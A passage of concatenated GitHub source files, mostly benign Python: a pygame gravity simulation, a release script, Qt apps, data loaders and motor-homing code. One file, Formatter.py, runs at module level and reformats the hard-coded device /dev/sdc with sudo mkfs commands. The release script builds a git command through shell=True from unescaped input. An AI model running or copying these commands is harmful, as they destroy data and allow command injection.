ac/(bc+ac)\n fory = bc/(bc+ac)\n return [round(forx, 10), round(fory, 10)]\n\ndef credits(screen):\n global v\n font=pygame.font.Font(None,30)\n txt=font.render(v, 1,(255,255,255))\n txt.set_alpha(50)\n screen.blit(txt, (10, 10))\n\ndef displaydata(screen, *args):\n font=pygame.font.Font(None,20)\n for k in args:\n txt=font.render(k, 1,(255,255,255))\n screen.blit(txt, (10, 40 + args.index(k) * 20))\n\n\nglobaloffset = [0, 0]\n\nclass Ball():\n def __init__(self, x, y, xvel, yvel, mass, color):\n self.positionx = float(x)\n self.positiony = float(y)\n self.velocityx = float(xvel)\n self.velocityy = float(yvel)\n self.color = pygame.Color(color)\n self.velocity = self.velocityx, self.velocityy\n self.mass = mass\n self.radius = 10\n self.dotpos = []\n \n def draw(self):\n pygame.draw.circle(display, self.color, (int(self.positionx + globaloffset[0]), int(self.positiony + globaloffset[1])), self.radius)\n \n \n\ndef game():\n global globaloffset\n balls = [Ball(400, 500, 200, 0, 100000, \"White\"), Ball(400, 300, -200, 0, 100000, \"Red\"), Ball(500, 400, 0, -200, 100000, \"Green\"), Ball(300, 400, 0, 200, 100000, \"Blue\")]\n #balls = [Ball(400, 500, 0, 0, 100000, \"White\"), Ball(400, 300, 0, 0, 100000, \"Green\"), Ball(300, 400, 0, 0, 100000, \"Red\"), Ball(500, 400, 0, 0, 100000, \"Yellow\")]\n #balls = [Ball(400, 300, 200, 0, 100000, \"White\"), Ball(400, 400, 0, 0, 200000, \"Red\"), Ball(400, 500, -200, 0, 100000, \"Green\")]\n #balls = [Ball(400, 400, 0.5, 0, 100000, \"White\"), Ball(400, 100, -50, 0, 1000, \"Green\"), Ball(400, 700, 50, 0, 1000, \"Yellow\")]\n #balls = []\n threshold = 1000\n paused = False\n\n\n focus = None\n \n while True:\n \n\n display.fill((0, 0, 0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n if event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n newbdata = [pos[0], pos[1]]\n if event.type == pygame.MOUSEBUTTONUP:\n pos = pygame.mouse.get_pos()\n balls.append(Ball(newbdata[0]-globaloffset[0], newbdata[1]-globaloffset[1], pos[0]-newbdata[0], pos[1]-newbdata[1], 100000, (0, 255, 0)))\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE:\n paused = not paused\n elif event.key == pygame.K_BACKSPACE:\n balls = []\n globaloffset = [0, 0]\n focus = None\n elif event.key == pygame.K_PERIOD:\n if focus is None or focus not in balls:\n focus = balls[0]\n else:\n if balls.index(focus) + 1 < len(balls):\n focus = balls[balls.index(focus) + 1]\n else:\n focus = balls[0]\n elif event.key == pygame.K_ESCAPE:\n focus = None\n\n\n keyspressed = pygame.key.get_pressed()\n if keyspressed[pygame.K_UP]: \n focus = None\n globaloffset[1] += 5\n if keyspressed[pygame.K_DOWN]: \n focus = None\n globaloffset[1] += -5\n if keyspressed[pygame.K_LEFT]:\n focus = None\n globaloffset[0] += 5\n if keyspressed[pygame.K_RIGHT]:\n focus = None\n globaloffset[0] += -5\n\n if focus is not None:\n globaloffset = [-focus.positionx+500, -focus.positiony+400]\n\n \n \n for i1 in balls:\n for j1 in balls:\n i, j = balls.index(i1), balls.index(j1)\n if i < j:\n acc = calculate_acceleration(i1.mass, j1.mass, calculate_distance((i1.positionx, i1.positiony), (j1.positionx, j1.positiony)))\n if i1.positionx > j1.positionx:\n i1.velocityx -= acc[0] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[0]\n j1.velocityx += acc[1] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[0]\n elif i1.positionx == j1.positionx:\n pass\n else:\n i1.velocityx += acc[0] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[0]\n j1.velocityx -= acc[1] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[0]\n if i1.positiony > j1.positiony:\n i1.velocityy -= acc[0] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[1]\n j1.velocityy += acc[1] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[1]\n elif i1.positiony == j1.positiony:\n pass\n else:\n i1.velocityy += acc[0] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[1]\n j1.velocityy -= acc[1] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[1]\n \n \n for m1 in balls[:]:\n for n1 in balls[:]:\n if m1 in balls and n1 in balls:\n if balls.index(m1) < balls.index(n1):\n if calculate_distance([m1.positionx, m1.positiony], [n1.positionx, n1.positiony]) <= (n1.radius + m1.radius):\n v1 = m1.velocityx * m1.mass/(m1.mass + n1.mass) + n1.velocityx * n1.mass/(m1.mass + n1.mass)\n v2 = m1.velocityy * m1.mass/(m1.mass + n1.mass) + n1.velocityy * n1.mass/(m1.mass + n1.mass)\n bcolor = pygame.Color(((m1.color[0]+n1.color[0])/2, (m1.color[1]+n1.color[1])/2, (m1.color[2]+n1.color[2])/2))\n newball = Ball((m1.positionx+n1.positionx)/2, (m1.positiony+n1.positiony)/2, v1, v2, m1.mass+n1.mass, bcolor)\n newball.radius = (n1.radius ** 2 + m1.radius ** 2) ** 0.5\n if focus == n1 or focus == m1:\n focus = newball\n balls.append(newball)\n balls.remove(n1)\n balls.remove(m1)\n \n\n\n for b in balls[:]:\n if len(balls) >= 50:\n if b.positionx > 2000 or b.positionx < -1200 or b.positiony > 2000 or b.positiony < -1200:\n balls.remove(b)\n continue\n b.positionx += round(b.velocityx/100, 8)\n b.positiony += round(b.velocityy/100, 8)\n b.draw()\n \n for k in balls:\n if len(k.dotpos) >= threshold:\n k.dotpos = k.dotpos[2:]\n \n k.dotpos.append((k.positionx, k.positiony))\n for dots in k.dotpos:\n pygame.draw.circle(display, pygame.Color(k.color), (dots[0] + globaloffset[0], dots[1] + globaloffset[1]), 1)\n credits(display)\n displaydata(display, f\"Coords: {int(globaloffset[0])}, {int(globaloffset[1])}\", f'Objects: {len(balls)}')\n pygame.display.update()\n click.tick(FPS)\nif __name__ == \"__main__\":\n game()\n pygame.quit()","repo_name":"BUSH222/bodies","sub_path":"old_versions/0.0.x/0.0.2.py","file_name":"0.0.2.py","file_ext":"py","file_size_in_byte":8098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30753366549","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport getopt, datetime, os, subprocess, sys\nos.chdir('../')\n\ndef main(argv):\n try:\n opts, args = getopt.getopt(argv, \"m:\", [\"message=\"])\n except getopt.GetoptError:\n sys.exit(2)\n for opt, arg in opts:\n if opt in (\"-m\", \"--message\"):\n message = arg\n major_v = 0\n minor_v = 6\n\n pyqtver = input('pyqtver: ')\n if pyqtver == 5:\n os.system(\"python3 prep-release/switch_pyqt5.py\")\n os.system(\"python3 prep-release/mkupdate_pyqt5\")\n elif pyqtver == 6:\n os.system(\"python3 prep-release/switch_pyqt6.py\")\n os.system(\"python3 prep-release/mkupdate_pyqt6\")\n\n #read minor minor release number\n f = open('prep-release/minor_minor_number.txt', 'r')\n ln = f.readlines()\n f.close()\n minor_minor_v = int(ln[0].strip()) + 1\n #write incremented minor minor release number\n f = open('prep-release/minor_minor_number.txt', 'w')\n f.write(str(minor_minor_v))\n f.close()\n builddate = datetime.datetime.now().strftime(\"%d-%b-%Y %H:%M\")\n #set git tag\n gittag = str(major_v) + '.' + str(minor_v) + '.' + str(minor_minor_v)\n \n f = open('pyproject.toml', 'r')\n ln = f.readlines()\n f.close()\n for i in range(len(ln)):\n if ln[i].strip().split('=')[0].strip() == \"version\":\n ln[i] = ' version=\"' + gittag +'\"\\n'\n\n f = open('pyproject.toml', 'w')\n f.writelines(ln)\n f.close()\n\n # f = open('setup-pyside.py', 'r')\n # ln = f.readlines()\n # f.close()\n # for i in range(len(ln)):\n # if ln[i].strip().split('=')[0].strip() == \"version\":\n # ln[i] = ' version=\"' + gittag +'\",\\n'\n\n # f = open('setup-pyside.py', 'w')\n # f.writelines(ln)\n # f.close()\n\n \n\n f = open('pychoacoustics/_version_info.py', 'r')\n ln = f.readlines()\n f.close()\n for i in range(len(ln)):\n if ln[i].strip().split('=')[0].strip() == \"pychoacoustics_version\":\n ln[i] = 'pychoacoustics_version = \"' + gittag +'\"\\n'\n if ln[i].strip().split('=')[0].strip() == \"pychoacoustics_builddate\":\n ln[i] = 'pychoacoustics_builddate = \"' + builddate +'\"\\n'\n\n f = open('pychoacoustics/_version_info.py', 'w')\n f.writelines(ln)\n f.close()\n\n\n f = open('pychoacoustics/doc/conf.py', 'r')\n ln = f.readlines()\n f.close()\n for i in range(len(ln)):\n if ln[i].strip().split('=')[0].strip() == \"version\":\n ln[i] = 'version = \"' + gittag +'\"\\n'\n if ln[i].strip().split('=')[0].strip() == \"release\":\n ln[i] = 'release = \"' + gittag + '\"\\n'\n\n f = open('pychoacoustics/doc/conf.py', 'w')\n f.writelines(ln)\n f.close()\n\n f = open('pychoacoustics.desktop', 'r')\n ln = f.readlines()\n f.close()\n for i in range(len(ln)):\n if ln[i].strip().split('=')[0].strip() == \"Version\":\n ln[i] = 'Version = ' + gittag +'\\n'\n\n f = open('pychoacoustics.desktop', 'w')\n f.writelines(ln)\n f.close()\n\n f = open('setup_cx.py', 'r')\n ln = f.readlines()\n f.close()\n for i in range(len(ln)):\n if ln[i].strip().split('=')[0].strip() == \"version\":\n ln[i] = ' version=\"' + gittag +'\",\\n'\n\n f = open('setup_cx.py', 'w')\n f.writelines(ln)\n f.close()\n\n f = open('prep-release/win_pychoacoustics.iss', 'r')\n ln = f.readlines()\n f.close()\n for i in range(len(ln)):\n if len(ln[i].strip().split(\" \"))>1:\n if ln[i].strip().split(\" \")[1] == \"MyAppVersion\":\n ln[i] = \"#define MyAppVersion \" + '\"' + gittag + '\"\\n'#' version=\"' + gittag +'\"\\n'\n\n f = open('prep-release/win_pychoacoustics.iss', 'w')\n f.writelines(ln)\n f.close()\n\n \n subprocess.call('git commit -a -m\"' + message+'\"', shell=True)\n #tag the commit so that it can be easily retrieved\n subprocess.call('git tag -a \"' + gittag +'\"' + ' -m \"' + gittag +'\"', shell=True)\n \nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"sam81/pychoacoustics","sub_path":"prep-release/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"3"} +{"seq_id":"43906707810","text":"import os\nimport psutil\nimport platform\nimport re\n\nclass Wiper():\n currDrive = ''\n drivePath = ''\n driveInfo = []\n linuxCommands = {}\n def __init__(self, drive=None):\n self.currDrive = drive\n\n def testDrive(self):\n print(self.drive)\n\n def closeDrive():\n self.drive.close()\n print(\"Drive Closed!\")\n\n def openDrive(self, drive):\n self.drive = drive\n print(\"Drive opened!\")\n\n def getFileSystem(self, driveLetter=None): #Gets file system and assigns it to self.drivePath\n print(self.drivePath)\n for disk in psutil.disk_partitions():\n print(disk[0])\n if driveLetter is None:\n if(disk[0] == self.drivePath):\n print(\"Found \" + self.drivePath + \"'s Metadata!\")\n self.driveInfo = disk\n print(self.driveInfo)\n else: #G:\\\\\n if(disk[0] == driveLetter):\n print(\"Found \" + self.drivePath + \"'s Metadata!\")\n self.driveInfo = disk\n print(self.driveInfo)\n\n\n return self.driveInfo\n\n def formatDrive(self, outputFileSystem=None, drive=None):\n if drive is None: #Use current drive\n drive = self.drive\n if outputFileSystem is None: #default Format\n outputFileSystem = \"FAT32\"\n if \"Linux\" in platform.platform(): #for Linux\n os.system(\"umount \" + self.drivePath)\n if outputFileSystem == \"FAT32\":\n os.system(\"sudo mkfs.vfat -F 32 \" + self.drivePath)\n print(\"Drive formatted to FAT32!\")\n elif outputFileSystem == \"ext4\": #Working\n os.system(\"sudo mkfs.ext4 \" + self.drivePath)\n print(\"Drive formatted to ext4!\")\n elif outputFileSystem == \"exFat\":\n os.system(\"sudo mkfs.exfat \" + self.drivePath)\n print(\"Drive formatted to exFat!\")\n\n def setDrivePath(self, path):\n self.drivePath = path\n\n def writeFile(self, fileName=None, string=None):#test Update: working!\n if fileName is None:\n fileName = \"sample.txt\"\n if string is None:\n string = \"Sample\"\n with open(os.path.join(self.driveInfo[1], fileName), \"w\") as file:\n file.write(string)\n print(\"File written at \" + os.path.join(self.driveInfo[1], fileName))\n\n def listFiles(self, path=None):\n if path is None:\n path = self.driveInfo[1]\n print(os.listdir(path))\n\n def deleteFile(self, fileName, algorithm=None, path=None):\n if path is None:\n path = self.driveInfo[1]\n if algorithm is None:\n algorithm = \"ZeroFill\"\n\n metadata = self.getMetaData(fileName)\n fileSize = metadata['File Size']\n with open(os.path.join(path,fileName), \"wb+\") as file:\n for ctr in range(0,fileSize):\n if algorithm is \"ZeroFill\":\n file.write(b'\\x00')\n print(\"Entered 0Fill\")\n elif algorithm is \"OneFill\":\n file.write(b'\\x11')\n print(\"Entered 1fill\")\n elif algorithm is \"AlterFill\": #Alternate Fill (0/1)\n if ctr % 0 is 0:\n file.write(b'\\x00')\n else:\n file.write(b'\\x11')\n elif algorithm is \"TwoFill\":\n file.write(b'\\x10')\n elif algorithm is \"ThreeFill\":\n file.write(b'\\x11')\n\n os.remove(os.path.join(path,fileName))\n\n print(\"File deleted!\")\n\n\n def getMetaData(self, fileName, path=None):\n if path is None:\n path = self.driveInfo[1]\n\n metadata = {}\n temp = os.stat(os.path.join(path,fileName))\n print(temp)\n metadata[\"File Name\"] = fileName\n metadata[\"Inode\"] = temp[1]\n metadata[\"File Size\"] = temp[6]\n\n print(metadata)\n return metadata\n #Do data unit and metadata layer\n\n#Variable for path (change using GUI or static only lol)\npath = \"/dev/sdc\"\n\n#Open drive in r+b\nwith open(path, 'r+b') as drive:\n wiper = Wiper()\n wiper.setDrivePath(path)\n wiper.openDrive(drive)\n\n#Testing the methods\nwiper.testDrive()\nwiper.getFileSystem()\nwiper.listFiles()\n#wiper.getMetadata(\"sample.txt\")\n#wiper.writeFile()\n#wiper.deleteFile(\"new 1.txt\", \"OneFill\")\nwiper.formatDrive(\"FAT32\") #Change argument to output fileSystem\n","repo_name":"joecatarata/DriveWiper","sub_path":"Formatter.py","file_name":"Formatter.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"14034844309","text":"import cv2\r\nimport numpy as np\r\nfrom annotation_helper import read_annotation, read_evaluate_annotation\r\nfrom interface import ModelData\r\n\r\ndef load_data(anno_path,input_shape, gray=True):\r\n data = read_annotation(anno_path)\r\n model_data = ModelData()\r\n model_data.X_train = np.array([ convert_data_format(item,input_shape,gray) for item in data.X_train])\r\n model_data.X_test = np.array([ convert_data_format(item,input_shape,gray) for item in data.X_test])\r\n model_data.Y_train = np.array([int(item) for item in data.Y_train] )\r\n model_data.Y_test = np.array([int(item) for item in data.Y_test])\r\n\r\n return model_data\r\n\r\ndef load_evaluate_data(anno_path,input_shape,gray=True):\r\n X,Y = read_evaluate_annotation(anno_path)\r\n x = np.array([ convert_data_format(item,input_shape,gray) for item in X])\r\n y = np.array([int(item) for item in Y])\r\n\r\n return x,y\r\n\r\ndef convert_data_format(item,input_shape,gray):\r\n new_item = cv2.resize(cv2.imread(item),input_shape)\r\n return cv2.cvtColor(new_item,cv2.COLOR_BGR2GRAY) if gray else new_item","repo_name":"khc0704/ez-model","sub_path":"ez_flask_server/data_helper.py","file_name":"data_helper.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31729989721","text":"import os\nimport sys\nimport time\n\nimport platformdirs\nfrom PySide6.QtCore import Qt, QTranslator\n\nimport nlight_res_rc\nimport darkdetect\nfrom PySide6.QtWidgets import QApplication\n\nfrom modrinthmanager.consts import APP_NAME, APP_VERSION\nfrom modrinthmanager.utils.threads import Thread\nfrom modrinthmanager.utils.utils import get_ui_style\nfrom modrinthmanager.windows.MainWindow import ParentWindow\n\n\nclass App(QApplication):\n def __init__(self, argv):\n super().__init__(argv)\n self.setApplicationDisplayName(APP_NAME)\n self.setApplicationVersion(APP_VERSION)\n # self.setWindowIcon(QIcon(Icons.App))\n\n self.translator = QTranslator()\n\n # self.load_font()\n # self.load_translator()\n self.update_style()\n\n # def load_translator(self):\n # self.translator.load(get_locale(QLocale().language()))\n # self.installTranslator(self.translator)\n\n # def load_font(self):\n # font = QFont(Fonts.SegoeUI, 9)\n # self.setFont(font)\n\n def update_style(self):\n self.setStyleSheet(get_ui_style(darkdetect.theme()))\n\n\nclass MainWindow(ParentWindow):\n def __init__(self):\n super().__init__()\n self.set_min_size_by_screen()\n self.setWindowTitle(APP_NAME)\n self._theme_updater = Thread(target=self.theme_listener, callback=self.update_style)\n self._theme_updater.start()\n self.show()\n\n @staticmethod\n def theme_listener():\n theme = darkdetect.theme()\n while darkdetect.theme() == theme:\n time.sleep(1)\n\n def update_style(self):\n app.update_style()\n self._theme_updater.start()\n\n def closeEvent(self, event):\n self._theme_updater.terminate()\n self._theme_updater.wait()\n app.closeAllWindows()\n event.accept()\n\n\nif __name__ == '__main__':\n QApplication.setHighDpiScaleFactorRoundingPolicy(Qt.HighDpiScaleFactorRoundingPolicy.RoundPreferFloor)\n QApplication.setStyle('Fusion')\n app = App(sys.argv)\n os.makedirs(f'{platformdirs.user_data_dir()}/{APP_NAME}', exist_ok=True)\n app.setStyleSheet(get_ui_style(darkdetect.theme()))\n window = MainWindow()\n sys.exit(app.exec())\n","repo_name":"brandonzorn/Modpacks-Manager","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"312807381","text":"import random\nimport time\nfrom env.constants import RANGE_OF_POINTS_LIMIT, RANGE_SIZE, NUM_OF_SEGMENTS\nfrom model.Point import Point\nfrom model.Segment import Segment\n\nimport sys\nimport OpenGL.GL as gl\nimport glfw\n\nimport pickle\ndef saveSegments(segments):\n timestr = time.strftime(\"%Y%m%d-%H%M%S\")\n filename = 'segments/segments_' + timestr + '.txt'\n dbfile = open(filename, 'wb')\n pickle.dump(segments, dbfile)\n dbfile.close()\n\n\ndef getSegments(filename = None):\n if not filename:\n return segmentFactory(-RANGE_OF_POINTS_LIMIT, RANGE_OF_POINTS_LIMIT,\n -RANGE_OF_POINTS_LIMIT, RANGE_OF_POINTS_LIMIT, NUM_OF_SEGMENTS, 0)\n dbfile = open(filename, 'rb')\n segments = pickle.load(dbfile)\n dbfile.close()\n\n reInitSegments = []\n for segment in segments:\n reInitSegments.append(Segment(segment.pt1, segment.pt2))\n return reInitSegments\n\n\ndef segmentFactory(minx,maxx,miny,maxy, numOfSegments, round_n_digits = 2):\n segments = [Segment(Point(0,0),Point(0,0))] * numOfSegments\n for i in range(0, numOfSegments):\n pt = [Point(0,0)]*2\n for j in range(0,2):\n if (round_n_digits == 0):\n pt[j] = Point(random.randint(minx, maxx), random.randint(miny, maxy))\n else:\n pt[j] = Point(round(random.uniform(minx,maxx),round_n_digits),\n round(random.uniform(miny,maxy),round_n_digits))\n segments[i] = Segment(pt[0], pt[1])\n return segments\n\n\ndef appendIfNotInList(list, data):\n if data in list:\n return\n list.append(data)\n\n\ndef drawResults(segments, intersectionPoints, windowTitle):\n def on_key(window, key, scancode, action, mods):\n if key == glfw.KEY_ESCAPE and action == glfw.PRESS:\n glfw.set_window_should_close(window,1)\n\n # Initialize the library\n if not glfw.init():\n sys.exit()\n\n # Create a windowed mode window and its OpenGL context\n window = glfw.create_window(2560, 1700, windowTitle, None, None)\n if not window:\n glfw.terminate()\n sys.exit()\n\n # Make the window's context current\n glfw.make_context_current(window)\n\n # Install a key handler\n glfw.set_key_callback(window, on_key)\n\n # Loop until the user closes the window\n while not glfw.window_should_close(window):\n # Render here\n width, height = glfw.get_framebuffer_size(window)\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n\n gl.glColor3f(1.0, 1.0, 1.0)\n gl.glLineWidth(5.0)\n gl.glEnable(gl.GL_BLEND)\n gl.glBegin(gl.GL_LINES)\n for segment in segments:\n gl.glVertex2f(segment.pt1.x/RANGE_SIZE, segment.pt1.y/RANGE_SIZE)\n gl.glVertex2f(segment.pt2.x/RANGE_SIZE, segment.pt2.y/RANGE_SIZE)\n gl.glEnd()\n\n gl.glPointSize(15.0)\n gl.glColor3f(1.0, 0.2, .18)\n gl.glEnable(gl.GL_BLEND)\n\n gl.glBegin(gl.GL_POINTS)\n for point in intersectionPoints:\n gl.glVertex2f(point.x/RANGE_SIZE,point.y/RANGE_SIZE)\n gl.glEnd()\n\n gl.glFlush()\n\n # Swap front and back buffers\n glfw.swap_buffers(window)\n\n # Poll for and process events\n glfw.poll_events()\n\n glfw.terminate()","repo_name":"vasMil/Multidimension-Data-Structures","sub_path":"LineSegmentIntersection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23073540203","text":"class Products:\n\n #method to initalize attributes\n def __init__(self, name, description, price, quantity, image):\n self.product_name = name\n self.product_description = description\n self.product_price = price\n self.product_quantity = quantity\n self.product_image = image\n \n\n #method to add products to the products list in the web app\n def add_product(self):\n product_dict = { #dictionary to represent attributes and their values \n \"name\": self.product_name,\n \"description\": self.product_description,\n \"price\": self.product_price,\n \"quantity\": self.product_quantity,\n \"image\": self.product_image\n }\n \n return product_dict\n\n\nproducts_list = [] #empty list to store all products\n\nnum_products = int(input(\"How many products do you want to add? \")) #prompt to enter no of produts to be added\n\n\n#loop to iterate over number of products to be added, and prompt user to enter details of each product\nfor i in range(num_products):\n name = input(f\"Enter the name of product {i+1}: \")\n description = input(f\"Enter the description of product {i+1}: \")\n price = float(input(f\"Enter the price of product {i+1}: \"))\n quantity = int(input(f\"Enter the quantity of product {i+1}: \"))\n image_url = input(f\"Enter the URL of product {i+1} image: \")\n \n product = Products(name, description, price, quantity, image_url) #object instantiation\n products_list.append(product) #adding new products to the all products list\n \n product_dict = product.add_product() #obtaining new products in dictionary structure\n print(product_dict)\n\n\n#method to edit existing products, takes wholeproduct list as a parameter\ndef edit_products(products_list):\n edit_product = input(\"Which product do you want to edit?:\") #prompt to enter product to be edited\n\n #looping through list of all products \n for product in products_list: \n if product.product_name == edit_product: #checking if the input product is in the list, if found, prompts to enter new details\n new_name = input(\"Enter the new name: \")\n new_description = input(\"Enter the new description: \")\n new_price = float(input(\"Enter the new price: \"))\n new_quantity = int(input(\"Enter the new quantity: \"))\n new_image_url = input(\"Enter the new image URL: \")\n \n #updating the product to match new values\n product.product_name = new_name\n product.product_description = new_description\n product.product_price = new_price\n product.product_quantity = new_quantity\n product.product_image = new_image_url\n \n return \"Product edited successfully.\"\n \n else: #if product not found\n print(\"Product not found.\")\n\nedit_products(products_list)\n\n#method to delete products from the product list, takes whole product list as a parameter\ndef delete_product(products_list):\n delete_product = input(\"Which product do you want to delete? \")\n\n #iterating through product list\n for product in products_list:\n if product.product_name == delete_product: #checking if the input product is in the list, if found, it is removed\n products_list.remove(product)\n return \"Product deleted successfully.\"\n \n else: #if product not found\n print(\"Product not found.\")\n \n\ndelete_product(products_list)","repo_name":"MariaGKimani/Backend-Mboga-Mtaani-","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31459531813","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nfrom Limit_Switches import limitSwitches\n\n\nls = limitSwitches()\n\n\ndef yHoming():\n\n GPIO.cleanup()\n\n DIR_1 = 19 # DIR+\n STEP_1 = 20 # PULL+\n\n # 0/1 used to signify clockwise or counterclockwise.\n CW = 0\n CCW = 1\n\n MAX = 10000\n\n motor1_flag = 0\n motor2_flag = 0\n\n GPIO.setmode(GPIO.BCM)\n motor1_switch = 18\n motor2_switch = 12\n GPIO.setup(motor1_switch, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n GPIO.setup(motor2_switch, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n # Establish Pins in software\n GPIO.setup(DIR_1, GPIO.OUT)\n GPIO.setup(STEP_1, GPIO.OUT)\n\n # Set the first direction\n GPIO.output(DIR_1, CCW)\n\n try:\n\n while 1:\n\n for x in range(MAX):\n\n GPIO.output(STEP_1, GPIO.HIGH)\n # Allow it to get there.\n # .5 == super slow\n sleep(0.005) # Dictates how fast stepper motor will run\n GPIO.output(STEP_1, GPIO.LOW)\n\n sleep(0.005)\n\n if GPIO.input(motor2_switch) == 0:\n motor2_flag += 1\n elif GPIO.input(motor1_switch) == 0:\n motor1_flag += 1\n else:\n motor2_flag = 0\n motor1_flag = 0\n\n if motor2_flag >= 5:\n print(\"Y Homing Complete\")\n sleep(1)\n return\n\n elif motor1_flag >= 5:\n print(\"Y Homing Complete\")\n sleep(1)\n return\n\n # Once finished clean everything up\n except KeyboardInterrupt:\n print(\"cleanup\")\n GPIO.cleanup()\n\n\ndef main():\n yHoming()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Bpatt9690/Exolith_Lab","sub_path":"Mark_IV/Motors/yhoming.py","file_name":"yhoming.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7043644598","text":"from PySide6.QtCore import QAbstractListModel, Qt, QModelIndex, QFileInfo, Signal\nfrom PySide6.QtGui import QIcon, QPixmap\nfrom typing import List\nfrom pathlib import Path\n\nclass ListModel(QAbstractListModel):\n rowAdded = Signal()\n rowRemoved = Signal()\n def __init__(self, fileList, parent=None):\n QAbstractListModel.__init__(self, parent)\n self.metadataList: List[Path] = fileList\n\n def flags(self, index):\n defaultFlags = QAbstractListModel.flags(self,index)\n return Qt.ItemIsDropEnabled | defaultFlags\n\n def canDropMimeData(self, data, action, row, column, parent):\n return data.hasUrls()\n\n def dropMimeData(self, data, action, row, column, parent):\n for file in data.urls():\n #if file.isLocalDirectory():\n self.addRow(Path(file.toLocalFile()))\n return True\n\n\n def rowCount(self, parent=QModelIndex()):\n return len(self.metadataList)\n\n def columnCount(self, parent=QModelIndex()):\n return 1\n\n def data(self, index, role):\n if role == Qt.DisplayRole:\n if index.column() == 0:\n return self.metadataList[index.row()].name\n elif role == Qt.DecorationRole:\n file_path = self.metadataList[index.row()]\n if file_path.is_dir():\n return QIcon(QPixmap(':/resources/Images/folder@2x.png'))\n else:\n return QIcon(QPixmap(':/resources/Images/file@2x.png'))\n return None\n\n def setData(self,index, value, role):\n if role == Qt.EditRole:\n if not index.isValid():\n return False\n if index.column() == 0:\n self.dataChanged.emit(index, index)\n return index.row()\n\n def addRow(self, filename):\n self.beginInsertRows(self.index(len(self.metadataList),0), len(self.metadataList),len(self.metadataList))\n self.metadataList.append(filename)\n self.endInsertRows()\n self.rowAdded.emit()\n\n def removeRow(self, rowIndex):\n self.beginRemoveRows(QModelIndex(),rowIndex, rowIndex)\n del self.metadataList[rowIndex]\n self.endRemoveRows()\n self.rowRemoved.emit()\n\n def removeAllRows(self):\n newI = 0\n for i in range(len(self.metadataList)):\n self.removeRow(i-newI)\n newI+=1\n\n\n\n","repo_name":"BlueQuartzSoftware/MetaForge","sub_path":"metaforge/models/uselistmodel.py","file_name":"uselistmodel.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"24600072256","text":"\"\"\" Parsing module \"\"\"\nfrom datetime import datetime, timedelta, tzinfo\nfrom time import strptime\nimport re\n\nfrom access_log_analyzer import (\n TIMESTAMP_PATTERN, LOG_PATTERN,\n TIMESTAMP_GROUP, REQUEST_GROUP, REQUEST_PATTERN,\n WHITELIST_PATTERNS, BLACKLIST_PATTERNS, RESOURCE_GROUP\n)\n\nclass Timezone(tzinfo):\n \"\"\" Timezone class \"\"\"\n def __init__(self, name=\"+0000\"):\n self.name = name\n seconds = int(name[:-2])*3600 + int(name[-2:])*60\n self.offset = timedelta(seconds=seconds)\n\n def utcoffset(self, dt):\n return self.offset\n\n def dst(self, dt):\n return timedelta(0)\n\n def tzname(self, dt):\n return self.name\n\ndef process_request_time(request_time):\n \"\"\" Process request time \"\"\"\n date_time = strptime(request_time[:-6], TIMESTAMP_PATTERN)\n time_zone = Timezone(request_time[-5:])\n\n time_info = list(date_time[:6]) + [0, None]\n\n date = datetime(*time_info)\n\n return date - timedelta(seconds=time_zone.offset.seconds)\n\ndef parse_log_line(line):\n \"\"\" Parse access log line \"\"\"\n groups = re.match(LOG_PATTERN, line).groups()\n\n timestamp = groups[TIMESTAMP_GROUP]\n request = groups[REQUEST_GROUP]\n\n whitelisted = False\n for pattern in WHITELIST_PATTERNS:\n if re.match(pattern, request):\n whitelisted = True\n break\n\n if not whitelisted:\n for pattern in BLACKLIST_PATTERNS:\n if re.match(pattern, request):\n return [None, None]\n\n groups = re.match(REQUEST_PATTERN, request).groups()\n\n content = groups[RESOURCE_GROUP]\n timestamp = process_request_time(timestamp)\n\n str_y = timestamp.strftime('%Y') # YYYY\n str_ym = timestamp.strftime('%Y%m') # YYYYMM\n str_yw = '%sW%s' % (str_y, '{:02d}'.format(timestamp.isocalendar()[1])) # YYYYWWW\n str_ymd = timestamp.strftime('%Y%m%d') # YYYYMMDD\n str_ymdh = timestamp.strftime('%Y%m%d%H') #YYYYMMDDHH\n\n return 